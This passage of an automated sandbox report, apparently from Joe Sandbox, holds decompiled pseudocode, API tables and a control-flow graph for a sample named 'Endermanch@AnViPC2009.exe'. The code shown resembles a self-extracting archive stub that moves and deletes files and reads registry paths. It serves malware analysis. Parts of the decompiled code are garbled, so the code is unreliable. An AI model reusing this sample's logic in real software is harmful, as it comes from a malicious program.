                                                                                                                                                  					if(E00406E67() == 0) {
                                                                                                                                                  						__eflags = 0;
                                                                                                                                                  						 *0x4192d8 = 0;
                                                                                                                                                  					} else {
                                                                                                                                                  						GetModuleFileNameW(0, "C:\Users\alfons\Desktop\Endermanch@AnViPC2009.exe", 0x400);
                                                                                                                                                  					}
                                                                                                                                                  					_t61 = GetModuleHandleA(0);
                                                                                                                                                  					 *0x414c78 = _t61; // executed
                                                                                                                                                  					_t18 = LoadIconA(_t61, 0x64); // executed
                                                                                                                                                  					 *0x4192d4 = _t18;
                                                                                                                                                  					 *0x4192d0 = LoadBitmapA( *0x414c78, 0x65); // executed
                                                                                                                                                  					E00411677( &_v12); // executed
                                                                                                                                                  					E004098B9(0, 0x414c88, _t59, 0x419ad8);
                                                                                                                                                  					E0040643B( &_v68);
                                                                                                                                                  					E0040643B( &_v40);
                                                                                                                                                  					_v44 = E0040AC7A(0x64);
                                                                                                                                                  					_v16 = E0040AC7A(0x64);
                                                                                                                                                  					 *0x418ecc =  &_v68;
                                                                                                                                                  					 *0x418ec8 =  &_v40; // executed
                                                                                                                                                  					_t28 = DialogBoxParamA(_t61, "STARTDLG", 0, E0040CC05, 0); // executed
                                                                                                                                                  					 *0x419f80 = 0;
                                                                                                                                                  					 *0x418ec8 = 0;
                                                                                                                                                  					 *0x418ecc = 0;
                                                                                                                                                  					E00406451(E00406451(_t28,  &_v40),  &_v68);
                                                                                                                                                  					_t57 =  &_v12;
                                                                                                                                                  					E004116EF( &_v12);
                                                                                                                                                  					_t72 =  *0x419f88; // 0x0
                                                                                                                                                  					if(_t72 != 0) {
                                                                                                                                                  						E0040B702( &_v12);
                                                                                                                                                  					}
                                                                                                                                                  					E0040A262(_t57, 0x419ee8, 0, 0x80);
                                                                                                                                                  					if( *0x41a824 > 0) {
                                                                                                                                                  						E0040A1DE( *0x41a818);
                                                                                                                                                  					}
                                                                                                                                                  					DeleteObject( *0x4192d4);
                                                                                                                                                  					_t34 =  *0x4192d0; // 0xb6050a85
                                                                                                                                                  					if(_t34 != 0) {
                                                                                                                                                  						DeleteObject(_t34);
                                                                                                                                                  					}
                                                                                                                                                  					_t75 =  *0x414c7c; // 0x0
                                                                                                                                                  					if(_t75 == 0) {
                                                                                                                                                  						_t76 =  *0x419f78; // 0x2
                                                                                                                                                  						if(_t76 != 0) {
                                                                                                                                                  							E0040321D(0x414c7c, 0xff);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t35 =  *0x41a828;
                                                                                                                                                  					 *0x419f78 = 2;
                                                                                                                                                  					if( *0x41a828 != 0) {
                                                                                                                                                  						E0040B6C3(_t35); // executed
                                                                                                                                                  					}
                                                                                                                                                  					__imp__OleUninitialize(); // executed
                                                                                                                                                  					ExitProcess( *0x414c7c);
                                                                                                                                                  				}
                                                                                                                                                  				E0040B45E(0x41fdc0, _t67, _t63);
                                                                                                                                                  				_t68 =  *0x419f91; // 0x0
                                                                                                                                                  				if(_t68 == 0) {
                                                                                                                                                  					SetEnvironmentVariableA("sfxcmd", _t63); // executed
                                                                                                                                                  					goto L8;
                                                                                                                                                  				}
                                                                                                                                                  				_t62 = OpenFileMappingA(4, 0, "winrarsfxmappingfile.tmp");
                                                                                                                                                  				if(_t62 == 0) {
                                                                                                                                                  					L6:
                                                                                                                                                  					CloseHandle(_t62);
                                                                                                                                                  					goto L8;
                                                                                                                                                  				}
                                                                                                                                                  				_t66 = MapViewOfFile(_t62, 4, 0, 0, 0x10000);
                                                                                                                                                  				if(_t66 != 0) {
                                                                                                                                                  					SetEnvironmentVariableA("sfxcmd", _t66);
                                                                                                                                                  				}
                                                                                                                                                  				UnmapViewOfFile(_t66);
                                                                                                                                                  				goto L6;
                                                                                                                                                  			}




















                                                                                                                                                  0x0040d38b
                                                                                                                                                  0x0040d396
                                                                                                                                                  0x0040d3a1
                                                                                                                                                  0x0040d3a3
                                                                                                                                                  0x0040d3a5
                                                                                                                                                  0x0040d407
                                                                                                                                                  0x0040d414
                                                                                                                                                  0x0040d420
                                                                                                                                                  0x0040d42d
                                                                                                                                                  0x0040d43e
                                                                                                                                                  0x0040d440
                                                                                                                                                  0x0040d42f
                                                                                                                                                  0x0040d436
                                                                                                                                                  0x0040d436
                                                                                                                                                  0x0040d44d
                                                                                                                                                  0x0040d452
                                                                                                                                                  0x0040d458
                                                                                                                                                  0x0040d466
                                                                                                                                                  0x0040d474
                                                                                                                                                  0x0040d479
                                                                                                                                                  0x0040d484
                                                                                                                                                  0x0040d48c
                                                                                                                                                  0x0040d494
                                                                                                                                                  0x0040d4a2
                                                                                                                                                  0x0040d4b0
                                                                                                                                                  0x0040d4b7
                                                                                                                                                  0x0040d4c5
                                                                                                                                                  0x0040d4ca
                                                                                                                                                  0x0040d4d3
                                                                                                                                                  0x0040d4d9
                                                                                                                                                  0x0040d4df
                                                                                                                                                  0x0040d4ed
                                                                                                                                                  0x0040d4f2
                                                                                                                                                  0x0040d4f5
                                                                                                                                                  0x0040d4fa
                                                                                                                                                  0x0040d500
                                                                                                                                                  0x0040d502
                                                                                                                                                  0x0040d502
                                                                                                                                                  0x0040d512
                                                                                                                                                  0x0040d51d
                                                                                                                                                  0x0040d525
                                                                                                                                                  0x0040d525
                                                                                                                                                  0x0040d536
                                                                                                                                                  0x0040d538
                                                                                                                                                  0x0040d53f
                                                                                                                                                  0x0040d542
                                                                                                                                                  0x0040d542
                                                                                                                                                  0x0040d544
                                                                                                                                                  0x0040d54a
                                                                                                                                                  0x0040d54c
                                                                                                                                                  0x0040d552
                                                                                                                                                  0x0040d55e
                                                                                                                                                  0x0040d55e
                                                                                                                                                  0x0040d552
                                                                                                                                                  0x0040d563
                                                                                                                                                  0x0040d568
                                                                                                                                                  0x0040d574
                                                                                                                                                  0x0040d577
                                                                                                                                                  0x0040d577
                                                                                                                                                  0x0040d57c
                                                                                                                                                  0x0040d588
                                                                                                                                                  0x0040d588
                                                                                                                                                  0x0040d3a8
                                                                                                                                                  0x0040d3ad
                                                                                                                                                  0x0040d3b3
                                                                                                                                                  0x0040d401
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d401
                                                                                                                                                  0x0040d3c3
                                                                                                                                                  0x0040d3c7
                                                                                                                                                  0x0040d3f2
                                                                                                                                                  0x0040d3f3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d3f3
                                                                                                                                                  0x0040d3d9
                                                                                                                                                  0x0040d3dd
                                                                                                                                                  0x0040d3e5
                                                                                                                                                  0x0040d3e5
                                                                                                                                                  0x0040d3ec
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040D38B
                                                                                                                                                    • Part of subcall function 0040E4FC: GetCPInfo.KERNEL32(00000000,?,?,00000000,?,?,0040E5B6,?,0040A6C1), ref: 0040E50D
                                                                                                                                                    • Part of subcall function 0040E4FC: IsDBCSLeadByte.KERNEL32(00000000,?,00000000), ref: 0040E521
                                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 0040D39B
                                                                                                                                                  • OpenFileMappingA.KERNEL32 ref: 0040D3BD
                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00010000), ref: 0040D3D3
                                                                                                                                                  • SetEnvironmentVariableA.KERNEL32(sfxcmd,00000000), ref: 0040D3E5
                                                                                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040D3EC
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040D3F3
                                                                                                                                                  • SetEnvironmentVariableA.KERNELBASE(sfxcmd,00000000,00000000), ref: 0040D401
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,00000400), ref: 0040D414
                                                                                                                                                  • SetEnvironmentVariableA.KERNELBASE(sfxname,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe), ref: 0040D420
                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,00000400), ref: 0040D436
                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 0040D447
                                                                                                                                                  • LoadIconA.USER32 ref: 0040D458
                                                                                                                                                  • LoadBitmapA.USER32 ref: 0040D46B
                                                                                                                                                  • DialogBoxParamA.USER32 ref: 0040D4CA
                                                                                                                                                  • DeleteObject.GDI32(00419EE8), ref: 0040D536
                                                                                                                                                  • DeleteObject.GDI32(B6050A85), ref: 0040D542
                                                                                                                                                  • OleUninitialize.OLE32(?), ref: 0040D57C
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D588
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$EnvironmentModuleVariable$DeleteHandleLoadNameObjectView$BitmapByteCloseCommandDialogExitIconInfoInitializeLeadLineMappingOpenParamProcessUninitializeUnmap
                                                                                                                                                  • String ID: C:\Users\user\Desktop\Endermanch@AnViPC2009.exe$C:\Users\user\Desktop\Endermanch@AnViPC2009.exe$STARTDLG$sfxcmd$sfxname$winrarsfxmappingfile.tmp$|LA
                                                                                                                                                  • API String ID: 1839015054-4213260093
                                                                                                                                                  • Opcode ID: 2e5c670fba278d0c7e8237f4ce34c1cb973fa7c2b4334fbc462e8232330a7cec
                                                                                                                                                  • Instruction ID: 75cd27527588883911dfe584df737a193eb5a8eb6cecd2d37243bd6620ac9025
                                                                                                                                                  • Opcode Fuzzy Hash: 2e5c670fba278d0c7e8237f4ce34c1cb973fa7c2b4334fbc462e8232330a7cec
                                                                                                                                                  • Instruction Fuzzy Hash: FB51A470940215BBD710BFB1DD899EE3AA8EB45705B05843BF602F22E1DBB80C55CB6E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 230 40bf72-40bf83 call 401200 233 40bf89-40bfb2 call 40b5ec 230->233 234 40ca3d-40ca3e 230->234 237 40bfb8-40bfb9 233->237 238 40ca3c 233->238 239 40bfba-40bfda 237->239 238->234 240 40bfe1-40bff4 call 40a8fe 239->240 243 40bff6 240->243 244 40bffa-40c013 lstrcmpiA 243->244 245 40c023-40c027 244->245 246 40c015-40c01c 244->246 248 40ca0c-40ca34 call 40b5ec 245->248 249 40c02d-40c030 245->249 246->244 247 40c01e 246->247 247->248 248->239 270 40ca3a-40ca3b 248->270 251 40c037-40c03b 249->251 252 40c2ec-40c2f0 249->252 253 40c2cd-40c2d1 249->253 254 40c23f-40c243 249->254 251->248 257 40c041-40c0c3 GetCurrentDirectoryA call 40a450 call 4076a1 call 40a5bb call 405b6f call 405b9f call 403517 call 405f6f 251->257 252->248 259 40c2f6-40c2fd 252->259 253->248 258 40c2d7-40c2e7 SetWindowTextA 253->258 254->248 255 40c249-40c255 254->255 261 40c262-40c266 255->261 262 40c257-40c25d call 40a5bb 255->262 336 40c0c9 257->336 337 40c22f-40c23a call 405b8c 257->337 258->248 259->248 260 40c303-40c317 259->260 265 40c319 260->265 266 40c31f-40c32a call 40a35d 260->266 268 40c270-40c278 call 40b793 261->268 269 40c268-40c26e 261->269 262->261 265->266 266->248 282 40c330-40c334 266->282 273 40c27a-40c27c 268->273 269->273 270->238 279 40c282-40c28d call 40a35d 273->279 280 40c27e-40c280 273->280 283 40c28f-40c2ac call 40a35d call 40a1fd 279->283 280->283 287 40c3ea-40c3ec 282->287 288 40c33a-40c33e 282->288 305 40c2b1-40c2bc call 40a5bb 283->305 306 40c2ae 283->306 293 40c350-40c358 call 40a450 287->293 294 40c3f2-40c3f4 287->294 288->287 292 40c344-40c34a 288->292 292->248 292->293 302 40c35d-40c36d call 40a3b2 293->302 298 40c400-40c41a RegOpenKeyExA 294->298 299 40c3f6-40c3fa 294->299 303 40c44b-40c452 298->303 304 40c41c-40c445 RegQueryValueExA RegCloseKey 298->304 299->293 299->298 319 40c378-40c3c3 call 40a450 call 40b989 GetDlgItem SetWindowTextA SendMessageA call 40a4c2 302->319 320 40c36f-40c373 302->320 309 40c454-40c46b call 40a35d 303->309 310 40c47e-40c49a call 40a35d * 2 303->310 304->303 305->248 325 40c2c2-40c2c8 call 40a1de 305->325 306->305 309->310 323 40c46d-40c479 call 40a5bb 309->323 310->302 334 40c4a0-40c4ad call 40a5bb 310->334 349 40c3c8-40c3ca 319->349 320->319 327 40c375 320->327 323->310 325->248 327->319 334->248 334->302 341 40c0ce-40c0e4 SetFileAttributesA 336->341 337->248 345 40c194-40c1a0 GetFileAttributesA 341->345 346 40c0ea-40c0f2 call 406e67 341->346 347 40c1a2-40c1b1 DeleteFileA 345->347 348 40c213-40c229 call 405f6f 345->348 346->345 355 40c0f8-40c129 call 4072d9 call 4076a1 call 40a35d 346->355 347->348 351 40c1b3-40c1b7 347->351 348->337 348->341 349->248 352 40c3d0-40c3e5 SendMessageA 349->352 356 40c1bf-40c1df wsprintfA GetFileAttributesA 351->356 352->248 370 40c12b-40c13a call 40a35d 355->370 371 40c13c-40c14c call 407252 355->371 359 40c1e1-40c1f7 MoveFileA 356->359 360 40c1b9-40c1bc 356->360 359->348 362 40c1f9-40c200 call 406e67 359->362 360->356 362->348 368 40c202-40c20d MoveFileExA 362->368 368->348 370->371 376 40c152-40c18e call 40a35d call 40a262 SHFileOperationA 370->376 371->337 371->376 376->345
                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                  			E0040BF72(void* __edx, void* __esi, signed int _a1, struct HWND__* _a4, char _a8, char _a11, signed int _a12) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				char _v9;
                                                                                                                                                  				int _v16;
                                                                                                                                                  				void* _v20;
                                                                                                                                                  				int _v24;
                                                                                                                                                  				struct _SHFILEOPSTRUCTA _v56;
                                                                                                                                                  				char _v568;
                                                                                                                                                  				char _v1080;
                                                                                                                                                  				char _v2103;
                                                                                                                                                  				char _v2104;
                                                                                                                                                  				char _v3127;
                                                                                                                                                  				char _v3128;
                                                                                                                                                  				char _v5176;
                                                                                                                                                  				char _v7223;
                                                                                                                                                  				char _v7224;
                                                                                                                                                  				void* _v8248;
                                                                                                                                                  				char _v9416;
                                                                                                                                                  				char _v12504;
                                                                                                                                                  				void _v13528;
                                                                                                                                                  				char _v16608;
                                                                                                                                                  				char _v17632;
                                                                                                                                                  				char _v21728;
                                                                                                                                                  				char _v25824;
                                                                                                                                                  				char _v29920;
                                                                                                                                                  				void* _v34016;
                                                                                                                                                  				char _v38112;
                                                                                                                                                  				char _v42207;
                                                                                                                                                  				char _v42208;
                                                                                                                                                  				char _v46304;
                                                                                                                                                  				signed int __edi;
                                                                                                                                                  				void* _t235;
                                                                                                                                                  				char _t240;
                                                                                                                                                  				void* _t316;
                                                                                                                                                  				void* _t323;
                                                                                                                                                  
                                                                                                                                                  				_t316 = __edx;
                                                                                                                                                  				_t235 = E00401200(0xb4dc);
                                                                                                                                                  				if(_a8 == 0) {
                                                                                                                                                  					return _t235;
                                                                                                                                                  				}
                                                                                                                                                  				_t240 = E0040B5EC(0x1000, __esi, _a8,  &_v21728,  &_v7224,  &_v9,  &_a11); // executed
                                                                                                                                                  				_a8 = _t240;
                                                                                                                                                  				if(_t240 == 0) {
                                                                                                                                                  					return _t240;
                                                                                                                                                  				} else {
                                                                                                                                                  					_push(__esi);
                                                                                                                                                  					goto L3;
                                                                                                                                                  					L6:
                                                                                                                                                  					while(lstrcmpiA( &_v21728,  *(0x4140b8 + _v8 * 4)) != 0) {
                                                                                                                                                  						_v8 = _v8 + 1;
                                                                                                                                                  						if(_v8 < 0xd) {
                                                                                                                                                  							continue;
                                                                                                                                                  						} else {
                                                                                                                                                  							L155:
                                                                                                                                                  							_t240 = E0040B5EC(0x1000, _t323);
                                                                                                                                                  							_a8 = _t240;
                                                                                                                                                  							asm("ror byte [edi], 0x85");
                                                                                                                                                  							[far dword [esi+0x5b](_a8,  &_v21728,  &_v7224,  &_v9,  &_a11);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					if(_v8 > 0xc) {
                                                                                                                                                  						goto L155;
                                                                                                                                                  					}
                                                                                                                                                  					switch( *((intOrPtr*)(_v8 * 4 +  &M0040CA42))) {
                                                                                                                                                  						case 0:
                                                                                                                                                  							__eflags = _a12 - 2;
                                                                                                                                                  							if(_a12 != 2) {
                                                                                                                                                  								goto L155;
                                                                                                                                                  							}
                                                                                                                                                  							GetCurrentDirectoryA(0x400,  &_v1080);
                                                                                                                                                  							E0040A450( &_v3128,  &_v1080);
                                                                                                                                                  							E004076A1( &_v3128);
                                                                                                                                                  							E0040A5BB( &_v3128,  &_v7224);
                                                                                                                                                  							E00405B6F( &_v16608);
                                                                                                                                                  							E00405B9F( &_v16608,  &_v3128);
                                                                                                                                                  							E00403517( &_v12504);
                                                                                                                                                  							_push(0);
                                                                                                                                                  							_t315 =  &_v16608;
                                                                                                                                                  							_t265 = E00405F6F( &_v16608, _t316,  &_v12504);
                                                                                                                                                  							__eflags = _t265;
                                                                                                                                                  							if(_t265 == 0) {
                                                                                                                                                  								L29:
                                                                                                                                                  								E00405B8C( &_v16608);
                                                                                                                                                  								goto L155;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t309 = "%s.%d.tmp";
                                                                                                                                                  								do {
                                                                                                                                                  									SetFileAttributesA( &_v12504, 0);
                                                                                                                                                  									__eflags = _v9416;
                                                                                                                                                  									if(_v9416 == 0) {
                                                                                                                                                  										L20:
                                                                                                                                                  										_t270 = GetFileAttributesA( &_v12504);
                                                                                                                                                  										__eflags = _t270 - 0xffffffff;
                                                                                                                                                  										if(_t270 == 0xffffffff) {
                                                                                                                                                  											goto L28;
                                                                                                                                                  										}
                                                                                                                                                  										_t274 = DeleteFileA( &_v12504);
                                                                                                                                                  										__eflags = _t274;
                                                                                                                                                  										if(_t274 != 0) {
                                                                                                                                                  											goto L28;
                                                                                                                                                  										} else {
                                                                                                                                                  											_v8 = _v8 & _t274;
                                                                                                                                                  											_push(_t274);
                                                                                                                                                  											goto L24;
                                                                                                                                                  											L24:
                                                                                                                                                  											wsprintfA( &_v2104, _t309,  &_v12504);
                                                                                                                                                  											_t326 = _t326 + 0x10;
                                                                                                                                                  											_t279 = GetFileAttributesA( &_v2104);
                                                                                                                                                  											__eflags = _t279 - 0xffffffff;
                                                                                                                                                  											if(_t279 != 0xffffffff) {
                                                                                                                                                  												_t66 =  &_v8;
                                                                                                                                                  												 *_t66 = _v8 + 1;
                                                                                                                                                  												__eflags =  *_t66;
                                                                                                                                                  												_push(_v8);
                                                                                                                                                  												goto L24;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t282 = MoveFileA( &_v12504,  &_v2104);
                                                                                                                                                  												__eflags = _t282;
                                                                                                                                                  												if(_t282 != 0) {
                                                                                                                                                  													_t283 = E00406E67();
                                                                                                                                                  													__eflags = _t283;
                                                                                                                                                  													if(_t283 != 0) {
                                                                                                                                                  														MoveFileExA( &_v2104, 0, 4);
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  												goto L28;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = E00406E67() - 4;
                                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                                  										goto L20;
                                                                                                                                                  									}
                                                                                                                                                  									E004072D9(_t315, __eflags,  &_v1080,  &_v8248);
                                                                                                                                                  									E004076A1( &_v8248);
                                                                                                                                                  									_t293 = E0040A35D(_t315,  &_v1080);
                                                                                                                                                  									_v16 = _t293;
                                                                                                                                                  									__eflags = _t293 - 4;
                                                                                                                                                  									if(_t293 < 4) {
                                                                                                                                                  										L18:
                                                                                                                                                  										_t295 = E00407252(_t315,  &_v7224, 0);
                                                                                                                                                  										__eflags = _t295;
                                                                                                                                                  										if(_t295 != 0) {
                                                                                                                                                  											goto L29;
                                                                                                                                                  										}
                                                                                                                                                  										L19:
                                                                                                                                                  										 *((char*)(_t325 + E0040A35D(_t315,  &_v12504) - 0x30d3)) = 0;
                                                                                                                                                  										E0040A262(_t315,  &_v56, 0, 0x1e);
                                                                                                                                                  										_push(0x14);
                                                                                                                                                  										_pop(_t300);
                                                                                                                                                  										_v56.fFlags = _t300;
                                                                                                                                                  										_v56.pFrom =  &_v12504;
                                                                                                                                                  										_v56.wFunc = 3;
                                                                                                                                                  										SHFileOperationA( &_v56);
                                                                                                                                                  										goto L20;
                                                                                                                                                  									}
                                                                                                                                                  									_t305 = E0040A35D(_t315,  &_v8248);
                                                                                                                                                  									__eflags = _v16 - _t305;
                                                                                                                                                  									if(_v16 > _t305) {
                                                                                                                                                  										goto L19;
                                                                                                                                                  									}
                                                                                                                                                  									goto L18;
                                                                                                                                                  									L28:
                                                                                                                                                  									_push(0);
                                                                                                                                                  									_t315 =  &_v16608;
                                                                                                                                                  									_t272 = E00405F6F( &_v16608, _t316,  &_v12504);
                                                                                                                                                  									__eflags = _t272;
                                                                                                                                                  								} while (_t272 != 0);
                                                                                                                                                  								goto L29;
                                                                                                                                                  							}
                                                                                                                                                  						case 1:
                                                                                                                                                  							__eflags = _a12;
                                                                                                                                                  							if(_a12 == 0) {
                                                                                                                                                  								__eax =  *0x41a81c;
                                                                                                                                                  								__eflags =  *0x41a81c;
                                                                                                                                                  								__ebx = __ebx & 0xffffff00 |  *0x41a81c == 0x00000000;
                                                                                                                                                  								__eflags = __bl;
                                                                                                                                                  								if(__bl == 0) {
                                                                                                                                                  									__eax = E0040A5BB(__eax, "<br>");
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _v9;
                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                  									__esi =  &_a8;
                                                                                                                                                  									__edi = E0040B793( &_a8, __eflags);
                                                                                                                                                  								} else {
                                                                                                                                                  									__edi =  &_v7224;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = __bl;
                                                                                                                                                  								if(__bl == 0) {
                                                                                                                                                  									__esi = E0040A35D(__ecx,  *0x41a81c);
                                                                                                                                                  								} else {
                                                                                                                                                  									__esi = 0;
                                                                                                                                                  								}
                                                                                                                                                  								E0040A35D(__ecx, __edi) = __eax + __esi + 5;
                                                                                                                                                  								__eax = E0040A1FD( *0x41a81c, __eax);
                                                                                                                                                  								 *0x41a81c = __eax;
                                                                                                                                                  								__eflags = __bl;
                                                                                                                                                  								if(__bl != 0) {
                                                                                                                                                  									 *__eax = 0;
                                                                                                                                                  								}
                                                                                                                                                  								__eax = E0040A5BB(__eax, __edi);
                                                                                                                                                  								__eflags = _v9;
                                                                                                                                                  								if(_v9 == 0) {
                                                                                                                                                  									__eax = E0040A1DE(__edi);
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							goto L155;
                                                                                                                                                  						case 2:
                                                                                                                                                  							__eflags = _a12;
                                                                                                                                                  							if(_a12 == 0) {
                                                                                                                                                  								 &_v7224 = SetWindowTextA(_a4,  &_v7224); // executed
                                                                                                                                                  							}
                                                                                                                                                  							goto L155;
                                                                                                                                                  						case 3:
                                                                                                                                                  							__eflags = _a12;
                                                                                                                                                  							if(_a12 != 0) {
                                                                                                                                                  								goto L155;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags =  *0x419f92;
                                                                                                                                                  							if( *0x419f92 != 0) {
                                                                                                                                                  								goto L155;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _v7224 - 0x22;
                                                                                                                                                  							__esi =  &_v7224;
                                                                                                                                                  							_v1080 = 0;
                                                                                                                                                  							if(_v7224 == 0x22) {
                                                                                                                                                  								__esi =  &_v7223;
                                                                                                                                                  							}
                                                                                                                                                  							__eax = E0040A35D(__ecx, __esi);
                                                                                                                                                  							__eflags = __eax - 0x400;
                                                                                                                                                  							if(__eax >= 0x400) {
                                                                                                                                                  								goto L155;
                                                                                                                                                  							} else {
                                                                                                                                                  								__al = __esi->i;
                                                                                                                                                  								__eflags = __al - 0x2e;
                                                                                                                                                  								if(__al != 0x2e) {
                                                                                                                                                  									L59:
                                                                                                                                                  									__eflags = __al - 0x5c;
                                                                                                                                                  									if(__al == 0x5c) {
                                                                                                                                                  										L53:
                                                                                                                                                  										 &_v1080 = E0040A450( &_v1080, __esi);
                                                                                                                                                  										L54:
                                                                                                                                                  										__eax =  &_v1080;
                                                                                                                                                  										__eax = E0040A3B2(__ecx,  &_v1080, 0x22);
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                  											__eflags =  *((char*)(__eax + 1));
                                                                                                                                                  											if( *((char*)(__eax + 1)) == 0) {
                                                                                                                                                  												 *__eax = 0;
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										 &_v1080 = E0040A450(__ebx,  &_v1080);
                                                                                                                                                  										 &_v1080 = E0040B989(__esi,  &_v1080);
                                                                                                                                                  										__esi = GetDlgItem(_a4, 0x65);
                                                                                                                                                  										 &_v1080 = SetWindowTextA(__esi,  &_v1080); // executed
                                                                                                                                                  										__eax = SendMessageA(__esi, 0x143, 0, __ebx); // executed
                                                                                                                                                  										__eax =  &_v1080;
                                                                                                                                                  										__eax = E0040A4C2(__ebx,  &_v1080);
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax != 0) {
                                                                                                                                                  											 &_v1080 = SendMessageA(__esi, 0x143, 0,  &_v1080);
                                                                                                                                                  										}
                                                                                                                                                  										goto L155;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = __al;
                                                                                                                                                  									if(__al == 0) {
                                                                                                                                                  										L62:
                                                                                                                                                  										__eax =  &_v20;
                                                                                                                                                  										__eax = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v20); // executed
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										if(__eax == 0) {
                                                                                                                                                  											 &_v16 =  &_v1080;
                                                                                                                                                  											__eax =  &_v24;
                                                                                                                                                  											_v16 = 0x400;
                                                                                                                                                  											__eax = RegQueryValueExA(_v20, "ProgramFilesDir", 0,  &_v24,  &_v1080,  &_v16); // executed
                                                                                                                                                  											__eax = RegCloseKey(_v20); // executed
                                                                                                                                                  										}
                                                                                                                                                  										__eflags = _v1080;
                                                                                                                                                  										if(_v1080 != 0) {
                                                                                                                                                  											__eax =  &_v1080;
                                                                                                                                                  											__eax = E0040A35D(__ecx,  &_v1080);
                                                                                                                                                  											__ecx =  &_v1080;
                                                                                                                                                  											__ecx =  &_v1080 - 1;
                                                                                                                                                  											__eflags =  *((char*)(__eax + __ecx)) - 0x5c;
                                                                                                                                                  											if( *((char*)(__eax + __ecx)) != 0x5c) {
                                                                                                                                                  												 &_v1080 = E0040A5BB( &_v1080, "\\");
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										__edi = E0040A35D(__ecx, __esi);
                                                                                                                                                  										__eax =  &_v1080;
                                                                                                                                                  										__edi = __edi + E0040A35D(__ecx,  &_v1080);
                                                                                                                                                  										__eflags = __edi - 0x3ff;
                                                                                                                                                  										if(__edi < 0x3ff) {
                                                                                                                                                  											 &_v1080 = E0040A5BB( &_v1080, __esi);
                                                                                                                                                  										}
                                                                                                                                                  										goto L54;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = __esi->i - 0x3a;
                                                                                                                                                  									if(__esi->i == 0x3a) {
                                                                                                                                                  										goto L53;
                                                                                                                                                  									}
                                                                                                                                                  									goto L62;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = __esi->i - 0x5c;
                                                                                                                                                  								if(__esi->i != 0x5c) {
                                                                                                                                                  									goto L59;
                                                                                                                                                  								}
                                                                                                                                                  								__esi =  &(__esi->i);
                                                                                                                                                  								__eflags = __esi->i;
                                                                                                                                                  								if(__esi->i == 0) {
                                                                                                                                                  									goto L155;
                                                                                                                                                  								}
                                                                                                                                                  								goto L53;
                                                                                                                                                  							}
                                                                                                                                                  						case 4:
                                                                                                                                                  							__eflags =  *0x419f8c - 1;
                                                                                                                                                  							__eflags = __eax - 0x419f8c;
                                                                                                                                                  							 *__edi =  *__edi + __ecx;
                                                                                                                                                  							__eflags = _a1 & __cl;
                                                                                                                                                  							 *__eax =  *__eax + __al;
                                                                                                                                                  							__eflags =  *__eax;
                                                                                                                                                  						case 5:
                                                                                                                                                  							__eax = _v7224;
                                                                                                                                                  							__eax = _v7224;
                                                                                                                                                  							__eflags = __eax;
                                                                                                                                                  							if(__eax == 0) {
                                                                                                                                                  								L81:
                                                                                                                                                  								 *0x419edf = 0;
                                                                                                                                                  								 *0x419ede = 1;
                                                                                                                                                  								goto L155;
                                                                                                                                                  							}
                                                                                                                                                  							__eax = __eax - 0x30;
                                                                                                                                                  							__eflags = __eax;
                                                                                                                                                  							if(__eax == 0) {
